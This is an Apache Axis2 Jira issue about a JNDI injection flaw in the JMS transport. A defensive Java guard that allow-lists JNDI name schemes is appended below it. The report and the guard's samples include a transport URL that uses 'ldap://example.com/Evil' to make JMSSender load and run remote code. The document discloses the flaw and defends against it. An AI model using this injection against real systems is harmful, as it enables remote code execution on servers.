[ https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Robert Lazarski closed AXIS2-6062.
----------------------------------
Resolution: Fixed
> Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol
> in `JMSSender`?
> --------------------------------------------------------------------------------------------
>
> Key: AXIS2-6062
> URL: https://issues.apache.org/jira/browse/AXIS2-6062
> Project: Axis2
> Issue Type: Bug
> Components: JMS transport
> Affects Versions: 1.8.2
> Reporter: Letian Yuan
> Assignee: Robert Lazarski
> Priority: Critical
> Fix For: 2.0.0
>
>
> In "org.apache.axis2:axis2-transport-jms", there is a method,
> `org.apache.axis2.transport.jms.JMSSender.invoke`, designed to send a
> JMS message. However, if we send a JMS message like this:
>
>     MessageContext context = new MessageContext();
>     context.setProperty("TransportURL",
>         "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil");
>     JMSSender sender = new JMSSender();
>     sender.invoke(context);
>
> Then, arbitrary commands from remote server "ldap://example.com/Evil" would
> be executed.
> We want to discuss with you about it.
> First, executing arbitrary commands from a remote server is quite dangerous.
> Second, as far as we know, no one would use the LDAP protocol to get a
> `ConnectionFactory`.
> Third, it seems this behavior has not been documented in your “User’s Guide”,
> so library users might not know this API for sending JMS messages can be used
> to execute arbitrary commands. So, I think that library users are very
> likely to misuse this API. For example, concatenating user input to the
> parameter of `invoke`. Or, making the parameter of `invoke`
> available in a configuration file such as `foobar.properties`. We
> know that such cases rarely happen and might not be your design purpose, but
> it is possible anyway. As long as an attacker can control the parameter of
> `invoke`, remote code injection might happen.
> Therefore, we want to ask you whether it is your design purpose and whether
> it is necessary for LDAP protocol (and RMI, JRMP, etc.).
> This is just our opinion, and we are willing to discuss it with you.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
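The report above turns on one point: the JNDI name taken from the `transport.jms.ConnectionFactoryJNDIName` query parameter is passed to a JNDI lookup as-is, and JNDI resolves names that begin with a URL scheme (`ldap:`, `rmi:`, ...) through the matching URL context factory, which is what makes a remote reference reachable from a transport URL. The guard below is an added example written for this page; it is not Axis2 code, and the class and method names (`JndiNameGuard`, `parseQuery`, `isSafeJndiName`, `requireSafeConnectionFactoryName`) are assumptions. It parses a `jms://` transport URL, pulls out the connection-factory JNDI name, and rejects any name that carries a scheme other than the container-local `java:` namespace, so that a caller who builds the transport URL from configuration or user input fails closed instead of triggering a remote lookup.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;

/**
 * Hypothetical guard (not part of Axis2) that vets the JNDI name carried in a
 * jms:// transport URL before it could ever reach a JNDI lookup.
 */
public final class JndiNameGuard {
    // Parameter name as used in the report; the value is what gets looked up in JNDI.
    private static final String CF_PARAM = "transport.jms.ConnectionFactoryJNDIName";

    // Only the container-local namespace is allowed to appear as a scheme prefix.
    // Anything else (ldap:, ldaps:, rmi:, iiop:, dns:, ...) would select a URL
    // context factory and resolve against a server named inside the JNDI name.
    private static final List<String> ALLOWED_SCHEMES = Arrays.asList("java");

    /** Splits the query part of a transport URL into decoded key/value pairs. */
    public static Map<String, String> parseQuery(String transportUrl) throws URISyntaxException {
        Map<String, String> params = new HashMap<>();
        String query = new URI(transportUrl).getRawQuery();
        if (query == null) {
            return params;
        }
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            params.put(URLDecoder.decode(key, StandardCharsets.UTF_8),
                       URLDecoder.decode(value, StandardCharsets.UTF_8));
        }
        return params;
    }

    /**
     * A JNDI name is considered safe when it is a plain compound name
     * ("ConnectionFactory", "jms/cf") or uses the java: namespace
     * ("java:comp/env/jms/cf"). A colon that precedes the first slash marks a
     * URL scheme, and only the allow-listed schemes pass.
     */
    public static boolean isSafeJndiName(String name) {
        if (name == null || name.isEmpty()) {
            return false;
        }
        int colon = name.indexOf(':');
        int slash = name.indexOf('/');
        boolean hasScheme = colon >= 0 && (slash < 0 || colon < slash);
        if (!hasScheme) {
            return true;
        }
        String scheme = name.substring(0, colon).toLowerCase(Locale.ROOT);
        return ALLOWED_SCHEMES.contains(scheme);
    }

    /**
     * Returns the connection-factory JNDI name from the transport URL, or null
     * if the parameter is absent; throws if the name would select a URL scheme.
     */
    public static String requireSafeConnectionFactoryName(String transportUrl) throws URISyntaxException {
        String name = parseQuery(transportUrl).get(CF_PARAM);
        if (name != null && !isSafeJndiName(name)) {
            throw new IllegalArgumentException("Refusing JNDI name with URL scheme: " + name);
        }
        return name;
    }

    public static void main(String[] args) throws URISyntaxException {
        // Constructed sample inputs: the URL from the report and two benign ones.
        String[] samples = {
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil",
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ConnectionFactory",
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=java:comp/env/jms/cf"
        };
        for (String url : samples) {
            try {
                System.out.println("accepted: " + requireSafeConnectionFactoryName(url));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

The check is an allow-list rather than a block-list of schemes, because a block-list has to be updated every time a new URL context factory shows up on the classpath. Where the remote directory really is the source of the connection factory, the usual pattern is to put the server address in `java.naming.provider.url` of the JNDI environment (configured by the operator, not carried in a per-message name) and keep the object name itself a plain compound name.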